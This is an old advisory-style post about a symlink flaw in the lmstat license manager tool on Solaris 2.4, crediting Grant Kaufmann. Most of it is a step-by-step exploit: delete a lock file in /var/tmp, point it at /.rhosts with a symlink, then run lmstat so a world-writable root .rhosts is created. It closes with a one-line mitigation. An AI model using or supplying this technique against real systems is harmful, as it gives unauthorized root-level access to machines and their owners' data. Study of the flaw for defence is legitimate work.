lmstat (license manager)
Solaris 2.4
The following vulnerability was posted by Grant Kaufmann. The
license manager must be running, expect both lmgrd.ste & suntechd
to be somewhere in your process table.
/var/tmp/locksuntechd will be created by anyone who runs lmstat,
with perms 666 and quite happy to follow symlinks. Anyway,
here's the exploit.
rm /var/tmp/locksuntechd
ln -s /.rhosts /var/tmp/locksuntechd
lmstat -c <insert your license file name here>
lmstat could be anywhere on your filesystem. Sometimes this won't
work first time. It won't create the file. Just run lmstat again
and it'll work.
Dunno. If there is no fix from sun, remove execute permission
for others.